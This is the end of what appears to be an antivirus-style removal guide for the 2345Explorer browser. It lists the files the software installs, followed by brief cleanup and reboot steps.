   %Program Files%\2345Soft\2345Explorer\StartPage\js\coral_clickcount.js (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_tit.gif (571 bytes)
   %Program Files%\2345Soft\2345Explorer\Config\FavIcon\85131C29C8F7B398A345BD7F1A51DAB1.ico (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_vtudou.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\home\2345_big.jpg (15 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_yahoo.png (4 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\informantCenter\popA.png (4 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\81C6AF03AC3E2B181DD99A3C1AFD1AA3.ico.jpg (762 bytes)
   %Program Files%\2345Soft\2345Explorer\UserCenter\retry.htm (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_xl_arrow.png (269 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_bing.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\Config\FavIcon\default_page.ico (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_bottombar_report2.gif (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\css\home.css (10 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\blank.gif (49 bytes)
   %Program Files%\2345Soft\2345Explorer\CoralTrident.dll (7972 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\incognito\main_search_bigicon_baidu.png (6 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\home\taobao_big.jpg (10 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\js\png.js (5 bytes)
   %Program Files%\2345Soft\2345Explorer\2345王牌浏览器免责声明.txt (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_wwiki.png (784 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\taskmanager.ico (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\bg_404.png (9 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_youdao.png (5 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\wico_qq.gif (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_sogou.png (5 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\blank.htm (908 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\page_white.png (416 bytes)
   %Program Files%\2345Soft\2345Explorer\Lang\CoralLang_chs.dll (9606 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsr4.tmp\System.dll (784 bytes)
   %Program Files%\2345Soft\2345Explorer\Config\Users\Default\SystemUrl.data (5520 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\fancybox\jquery.fancybox-1.3.4.css (8 bytes)
   %Program Files%\2345Soft\2345Explorer\Skins\Coral.dui (784 bytes)
   %Program Files%\2345Soft\2345Explorer\Skins\Coral.xml (5064 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\gradient_bg.png (246 bytes)
   %Program Files%\2345Soft\2345Explorer\UserCenter\images\lg_retry.png (13 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\incognito\bgrx.jpg (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\home\game_big.jpg (12 bytes)
   %Program Files%\2345Soft\2345Explorer\CoralExtract.dll (1712 bytes)
   %Program Files%\2345Soft\2345Explorer\Uninstall.exe (3700 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_02.jpg (4992 bytes)
   %Program Files%\2345Soft\2345Explorer\Config\FavIcon\3D6A8AC8F2013B0D7A1EA53076E96320.ico (2 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_item2.png (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_vyouku.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\UserCenter\images\yzm.png (1 bytes)
   %Program Files%\2345Soft\2345Explorer\UserCenter\regRetry.htm (927 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\icon_music.png (4 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\home\sohu_big.jpg (15 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\home\dongman_big.jpg (13 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\wico_2345.gif (358 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_vyouku.png (784 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_item_loading.gif (4 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_vgoogle.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\Config\FavIcon\6E086A7049DD129DF69051413AC6AB3A.ico (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_edit_bg.gif (2 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\wico_sina.gif (628 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_item2_hover1.png (2 bytes)
   %Program Files%\2345Soft\2345Explorer\CoralHtmlWnd.dll (1733 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsr4.tmp\modern-header.bmp (9 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_bg2.png (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_vsoso.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_02_1366.jpg (2392 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_dbaidu.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\Config\FavIcon\home.ico (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_youdao.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_tit_hover.gif (737 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_item_add.jpg (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_wsoso.png (13 bytes)
   %Program Files%\2345Soft\2345Explorer\Config\FavIcon\3D6A8AC8F2013B0D7A1EA53076E96320.ico.jpg (768 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_baidu.png (4 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\8FDEAD446A8D607C20207D38D669E349.ico.jpg (738 bytes)
   %Program Files%\2345Soft\2345Explorer\Config\FavIcon\F2A7BED2A1035F9E4EC022B3ECA481A8.ico.jpg (805 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\icon_inquiry.png (4 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\index.htm (784 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_dgoogle.png (784 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\DA3E6E24050AA14E8FD334F6DA0AE9F1.ico.jpg (776 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\wico_163.gif (82 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\pie\pie.htc (1552 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_gjyjo.png (784 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\icon_novel.png (6 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_xshooter.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\home\weibo_big.jpg (14 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_button2.gif (886 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\error\btn.jpg (5 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\recovery.htm (2 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\js\move.js (11 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_xl_background2.gif (472 bytes)
   %Program Files%\2345Soft\2345Explorer\UserCenter\images\sign_btnbg_h.png (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_baidu.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_03.jpg (5064 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_msoso.png (14 bytes)
   %Program Files%\2345Soft\2345Explorer\Config\FavIcon\recovery.ico (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_bigicon_soso.png (6 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\dd_dot.png (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\ico_ie.gif (634 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsr4.tmp\FileInfo.dll (3312 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\home\tv_big.jpg (14 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\icon_game.png (6 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\loading.gif (771 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_gjyjo.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\css\jquery.loadmask.css (846 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_vgoogle.png (784 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_sogou.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_icon2.gif (2 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_preview_but2.gif (637 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_ibaidu.png (5 bytes)
   %Program Files%\2345Soft\2345Explorer\Config\MobileScanner.png (7 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_bar_remove.gif (590 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_pre_01.bmp (784 bytes)
   %Program Files%\2345Soft\2345Explorer\Coral.dll (12288 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search_baidu.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\add_bg.png (839 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_content_error.jpg (11 bytes)
   %Program Files%\2345Soft\2345Explorer\Config\Users\Default\head_default.png (4 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_wbaidu.png (4 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\icon_movie.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\grid_load.png (1 bytes)
   %Program Files%\2345Soft\2345Explorer\Skins\Coral.skn (25824 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_xxunlei.png (11 bytes)
   %Program Files%\2345Soft\2345Explorer\Config\FavIcon\private.ico (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_xverycd.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_pre_04.bmp (784 bytes)
   %Program Files%\2345Soft\2345Explorer\UserCenter\images\sign_delbtn.png (1 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\home.ico (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_bar_remove2.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_item1.png (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\gradient_bottom.png (2 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_edit_bg2.gif (718 bytes)
   %Program Files%\2345Soft\2345Explorer\Config\FavIcon\85131C29C8F7B398A345BD7F1A51DAB1.ico.jpg (768 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\incognito.htm (2 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_edit_background2.gif (769 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_01.jpg (4992 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\icon_goods.png (4 bytes)
   %Program Files%\2345Soft\2345Explorer\msvcr80.dll (3699 bytes)
   %Program Files%\2345Soft\2345Explorer\Config\FavIcon\taskmanager.ico (1 bytes)
   %Program Files%\2345Soft\2345Explorer\UserCenter\css\sign.css (4 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\switch_widbar_icon2.gif (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_Default.jpg (2392 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_bigicon_baidu.png (6 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\home\game.2345.com.jpg (13 bytes)
   %Program Files%\2345Soft\2345Explorer\Config\Install.data (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\js\coral_lib_min.js (2392 bytes)
   %Program Files%\2345Soft\2345Explorer\UserCenter\images\sign_dropbtn.png (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\ico_sogo.gif (1 bytes)
   %Program Files%\2345Soft\2345Explorer\Config\Users\Default\login_head_default.png (4 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\guide_ie.gif (271 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\iconBg.png (4 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_gtaobao.png (12 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_msoso.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_vbaidu.png (4 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_gdangdang.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\home\book_big.jpg (784 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\error\404_1.jpg (8 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\add_hover.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\close_tab.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_preview_but.gif (684 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_vsoso.png (14 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\incognito\main.jpg (1552 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_none.png (186 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\hot.png (255 bytes)
   %Program Files%\2345Soft\2345Explorer\Config\FavIcon\6E086A7049DD129DF69051413AC6AB3A.ico.jpg (764 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\incognito\main_search_bg2.png (1 bytes)
   %Program Files%\2345Soft\2345Explorer\Config\FavIcon\1860F34853BBC50F66BF81B679989830.ico.jpg (778 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_gpaipai.png (7 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_button.gif (1 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_pre_Default.bmp (784 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_xshooter.png (784 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\home\fenghuang_big.jpg (12 bytes)
   %Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\F2A7BED2A1035F9E4EC022B3ECA481A8.ico.jpg (805 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_xduote.png (3 bytes)
   %Program Files%\2345Soft\2345Explorer\StartPage\images\home\baidu_big.jpg (11 bytes)
   %Program Files%\2345Soft\2345Explorer\2345Explorer.exe (418 bytes)

4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
5. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.